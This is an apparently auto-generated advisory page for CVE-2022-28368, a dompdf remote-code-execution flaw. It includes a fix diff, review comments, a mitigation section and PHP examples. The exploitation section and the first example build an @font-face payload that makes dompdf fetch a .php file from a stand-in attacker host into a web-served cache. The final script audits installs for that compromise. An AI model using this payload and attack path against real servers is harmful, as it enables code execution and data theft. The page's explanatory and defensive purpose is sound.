CVE-2022-28368
Description
Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Dompdf 1.2.1 allows RCE via a .php file in the src:url field of an @font-face CSS statement within an HTML input.
Vulnerability
Dompdf version 1.2.1 contains a remote code execution vulnerability in the handling of @font-face CSS rules. When a stylesheet declares a font with src:url(), FontMetrics::registerFont() downloads the referenced file, stores it in the font cache directory (lib/fonts under the package root by default) and, before the fix, built the cache file name by appending the extension found in the remote URL's path: strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)), the line removed in the patch shown below. The extension is therefore attacker-controlled, and a url() whose path ends in .php yields a cached file ending in .php. dompdf does not execute that file itself; the danger is that the font cache usually sits under the web root (for example vendor/dompdf/dompdf/lib/fonts/), so a direct HTTP request for the cached file is handed to the PHP interpreter by the web server. The body of the file is whatever the attacker served, subject only to dompdf's font loader accepting it. The fix, commit 4c70e1025bcd from pull request #2808, assigns the extension from the parsed font type instead of the URL [1][2].
Exploitation
The attacker needs an endpoint that renders attacker-supplied HTML or CSS with a vulnerable dompdf, and a font cache directory reachable over HTTP, which is the case for the default lib/fonts location whenever the vendor tree is under the document root. No authentication is required beyond whatever the PDF-generating feature itself demands. The attacker hosts a file whose URL path ends in .php and whose contents the font loader still accepts (the public exploit satisfies this by embedding PHP code in a genuine font file), then submits HTML whose stylesheet contains a rule such as @font-face { font-family: 'exploit'; src: url('http://attacker.example/exploit.php'); } together with an element styled font-family: 'exploit'. dompdf fetches the file and writes it to the cache under a predictable name (the reports show the family, the style string and an MD5 hash of the remote URL) with the .php extension taken from the URL; the attacker then requests that path through the web server and the embedded code runs. Nothing needs to pre-exist on the target filesystem, no upload feature is involved, and the generated PDF is irrelevant to the attack [1][2].
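The cache-name derivation at the heart of this bug, as an added PHP example that is not dompdf's code and not the published proof of concept: it runs the expression the patch removed, and the post-fix one, against a constructed attacker URL, shows where the cached file becomes reachable, and builds the kind of @font-face payload described above. The host attacker.example, the document root and the <family>_<style>_<md5(url)> prefix used for the cache name are assumptions; nothing is fetched or executed.

```php
<?php
// Added example for this page; not dompdf code and not the published PoC.
// Reproduces the cache-name derivation removed by commit 4c70e1025bcd next to
// the post-fix derivation, on a constructed attacker URL. Nothing is fetched.
// Assumptions: attacker.example, $docRoot and the "<family>_<style>_<md5>"
// cache prefix are illustrative stand-ins.

declare(strict_types=1);

$docRoot    = '/var/www/app';                                     // assumed document root
$fontDir    = $docRoot . '/vendor/dompdf/dompdf/lib/fonts';       // dompdf's default font cache
$remoteFile = 'http://attacker.example/fonts/exploit.php?v=1';    // constructed attacker URL

// Illustrative stand-in for how dompdf names a remotely registered font:
// family, style string and an MD5 of the URL (assumed format).
function cachePrefix(string $fontDir, string $family, string $styleString, string $remoteFile): string
{
    $prefix = preg_replace('/[^-_\w]+/', '', strtolower($family) . '_' . $styleString);
    return $fontDir . '/' . $prefix . '_' . md5($remoteFile);
}

// Before the fix: the extension is copied from the URL path, so the attacker picks it.
function vulnerableLocalFile(string $prefix, string $remoteFile): string
{
    return $prefix . '.' . strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION));
}

// After the fix: the extension follows the parsed font type; the patch maps
// TrueType and every other type to ".ttf", so the URL no longer matters.
function fixedLocalFile(string $prefix, string $fontType): string
{
    switch ($fontType) {
        case 'TrueType':
        default:
            return $prefix . '.ttf';
    }
}

// URL path at which the cached file is served when the vendor tree is under the web root.
function webPathFor(string $docRoot, string $localFile): ?string
{
    $base = rtrim($docRoot, '/') . '/';
    return strncmp($localFile, $base, strlen($base)) === 0
        ? substr($localFile, strlen($base) - 1)
        : null;
}

// Constructed payload: the HTML an attacker submits to the PDF endpoint.
function fontFacePayload(string $family, string $remoteFile): string
{
    return "<html><head><style>\n"
        . "@font-face { font-family: '{$family}'; src: url('{$remoteFile}'); font-weight: normal; font-style: normal; }\n"
        . "</style></head><body style=\"font-family: '{$family}';\">x</body></html>\n";
}

$prefix = cachePrefix($fontDir, 'exploitfont', 'normal', $remoteFile);
$before = vulnerableLocalFile($prefix, $remoteFile);   // ends in .php: attacker-chosen
$after  = fixedLocalFile($prefix, 'TrueType');         // ends in .ttf: fixed by type

echo fontFacePayload('exploitfont', $remoteFile);
echo "cached as (vulnerable): {$before}\n";
echo "reachable at:           " . (webPathFor($docRoot, $before) ?? '(outside web root)') . "\n";
echo "cached as (fixed):      {$after}\n";
```

The query string in the constructed URL is there on purpose: parse_url(..., PHP_URL_PATH) strips it, so "?v=1" does not hide the .php extension, and the vulnerable branch still produces a .php cache name.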
Impact
Successful exploitation gives the attacker arbitrary PHP execution as the web server or PHP-FPM user, triggered by the attacker's own HTTP request for the cached file rather than during PDF rendering. From there the usual consequences follow: exposure of application data and credentials, file manipulation, and a foothold for lateral movement within the network. NVD rates the vulnerability CVSS v3.1 9.8 (Critical): network attack vector, low attack complexity, no privileges and no user interaction required [2].
Mitigation
The dompdf project fixed this in pull request #2808 (commit 4c70e1025bcd): the cache extension is no longer taken from the remote URL but assigned after the font has been loaded, from the parsed font type (the patch maps TrueType, and every other type, to .ttf). The GitHub Security Advisory lists 1.2.1 as the first patched release (see Affected packages below), while the NVD description names 1.2.1 as affected, so upgrade to the current dompdf release from Packagist and verify that the installed src/FontMetrics.php no longer contains the removed pathinfo(parse_url($remoteFile, ...)) line [3]. Until the upgrade is done: move the font cache (the fontDir and fontCache options) outside the document root, or configure the web server to deny direct requests to lib/fonts, so that a cached file cannot be executed whatever its name; do not enable remote resource loading where the application does not need it; and treat any hash-suffixed .php file in the font cache as an indicator of compromise. Restricting open_basedir does not help, because the attack does not depend on dompdf reading files outside its own directory. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities catalog [4].
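Two checks an operator can run, as an added PHP example that is not part of dompdf or the advisory: whether the installed src/FontMetrics.php still contains the extension derivation the fix removed, and whether the font cache holds remotely registered fonts with an extension other than .ttf, or any unexpected .php file. The <prefix>_<md5>.<ext> cache naming pattern and the list of benign .php names are assumptions; the fixture tree is constructed so the script runs without dompdf installed, and pointing $root at a real vendor/dompdf/dompdf directory audits an actual install.

```php
<?php
// Added example for this page; not dompdf code and not an advisory tool.
// Check 1: is the line removed by commit 4c70e1025bcd still in FontMetrics.php?
// Check 2: does the font cache contain entries a font cache should not hold?
// Assumptions: the "<family>_<style>_<md5(url)>.<ext>" cache naming and the
// benign .php names below. The fixture is constructed so this runs offline.

declare(strict_types=1);

// The expression the fix deleted; if it is still present, the install is unpatched.
const VULNERABLE_EXPR = 'pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)';

// Assumed benign .php entries in a dompdf font directory (the family cache).
const BENIGN_PHP = ['dompdf_font_family_cache.php', 'dompdf_font_family_cache.dist.php'];

function fontMetricsIsPatched(string $fontMetricsPath): bool
{
    $src = file_get_contents($fontMetricsPath);
    if ($src === false) {
        throw new RuntimeException("cannot read {$fontMetricsPath}");
    }
    return strpos($src, VULNERABLE_EXPR) === false;
}

/** Returns [filename => reason] for cache entries that warrant a look. */
function suspiciousCacheFiles(string $fontDir): array
{
    $findings = [];
    foreach (scandir($fontDir) ?: [] as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        // Remotely registered fonts: <family>_<style>_<32 hex>.<ext> (assumed naming).
        // Only the font itself (.ttf after the fix) and its .ufm metrics are expected.
        if (preg_match('/_[0-9a-f]{32}\.[^.]+$/i', $name) && !in_array($ext, ['ttf', 'ufm'], true)) {
            $findings[$name] = "remote font cached with extension .{$ext}";
            continue;
        }
        // Any other .php apart from the family cache and the .afm.php/.ufm.php metric caches.
        if ($ext === 'php' && !in_array($name, BENIGN_PHP, true) && !preg_match('/\.(afm|ufm)\.php$/i', $name)) {
            $findings[$name] = 'unexpected PHP file in font directory';
        }
    }
    return $findings;
}

/** Constructed fixture: an unpatched FontMetrics.php and one planted cache entry. */
function buildFixture(): string
{
    $root = sys_get_temp_dir() . '/dompdf-audit-' . bin2hex(random_bytes(4));
    mkdir("{$root}/src", 0700, true);
    mkdir("{$root}/lib/fonts", 0700, true);
    // The removed line, as it read before the fix.
    file_put_contents("{$root}/src/FontMetrics.php",
        "<?php\n\$localFile .= \".\".strtolower(" . VULNERABLE_EXPR . ");\n");
    $hash = md5('http://attacker.example/exploit.php');
    file_put_contents("{$root}/lib/fonts/exploitfont_normal_{$hash}.php", "<?php // planted\n");
    file_put_contents("{$root}/lib/fonts/exploitfont_normal_{$hash}.ufm", "StartFontMetrics 4.1\n");
    file_put_contents("{$root}/lib/fonts/dompdf_font_family_cache.php", "<?php return [];\n");
    file_put_contents("{$root}/lib/fonts/DejaVuSans.ttf", "\x00\x01\x00\x00");
    return $root;
}

$root = buildFixture();   // replace with the real vendor/dompdf/dompdf path to audit an install
printf("FontMetrics.php patched: %s\n", fontMetricsIsPatched("{$root}/src/FontMetrics.php") ? 'yes' : 'NO');
foreach (suspiciousCacheFiles("{$root}/lib/fonts") as $name => $why) {
    printf("SUSPICIOUS %s: %s\n", $name, $why);
}
```

On the fixture the first check reports the install as unpatched and the second flags the planted .php entry while leaving its .ufm companion, the family cache and the bundled .ttf alone. Run the second check on the real cache regardless of patch status: a hash-suffixed .php left over from before the upgrade stays executable until it is deleted or the directory is taken out of the web root.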
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| dompdf/dompdf (Packagist) | < 1.2.1 | 1.2.1 |
Affected products
- Dompdf/Dompdf
Patches
4c70e1025bcd Match installed font filename extension to type
1 file changed · +7 −1
src/FontMetrics.php+7 −1 modified@@ -206,7 +206,6 @@ public function registerFont($style, $remoteFile, $context = null) } $cacheEntry = $localFile; - $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)); $entry[$styleString] = $cacheEntry; @@ -258,6 +257,13 @@ public function registerFont($style, $remoteFile, $context = null) return false; } + switch ($font->getFontType()) { + case "TrueType": + default: + $localFile .= ".ttf"; + break; + } + $font->parse(); $font->saveAdobeFontMetrics("$cacheEntry.ufm"); $font->close();
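Review bot: the deletion in the first hunk (@@ -206,7 +206,6 @@) removes the only place the cache file's extension came from attacker input, `strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION))`, which is the right fix, but the surviving lines `$cacheEntry = $localFile;` and `$entry[$styleString] = $cacheEntry;` carry no comment saying that `$localFile` must stay extension-less until the font has been loaded and typed. A one-line comment at that spot (for example "extension is assigned after Font::load succeeds; never derive it from $remoteFile") would keep a later refactor from reintroducing the URL-derived suffix.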
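Review bot: in the second hunk (@@ -258,6 +257,13 @@) the added `switch ($font->getFontType())` has a single `case "TrueType":` that falls into `default:`, so every font type gets `.ttf` and the switch is equivalent to a plain `$localFile .= ".ttf";` while reading as if other types were handled. Either enumerate the types the loader can return with their extensions, or collapse it to the single assignment with a comment stating that the suffix is deliberately fixed regardless of type. A regression test that registers a font from a URL whose path ends in `.php` and asserts the cached name ends in `.ttf` would pin the behaviour this hunk is meant to guarantee.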
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-x752-qjv4-c4hc (GitHub Security Advisory)
- nvd.nist.gov/vuln/detail/CVE-2022-28368 (NVD entry)
- packetstormsecurity.com/files/171738/Dompdf-1.2.1-Remote-Code-Execution.html (exploit write-up)
- github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2022-28368.yaml (FriendsOfPHP advisory)
- github.com/dompdf/dompdf/commit/4c70e1025bcd9b7694b95dd552499bd83cd6141d (fix commit)
- github.com/dompdf/dompdf/issues/2598 (upstream issue)
- github.com/dompdf/dompdf/pull/2808 (fix pull request)
- packagist.org/packages/dompdf/dompdf (package page)
- snyk.io/blog/security-alert-php-pdf-library-dompdf-rce (Snyk write-up; listed by both GHSA and MITRE)
News mentions
No linked articles in our index yet.